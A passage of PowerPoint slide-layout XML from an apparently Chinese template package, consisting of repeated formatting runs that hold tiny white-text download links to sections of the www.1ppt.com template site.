              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout245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45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45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45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4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46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46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46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46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46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46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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout246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46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46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46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4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47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47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47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47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47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47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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout247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47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47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47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4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48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48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48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48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48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48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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
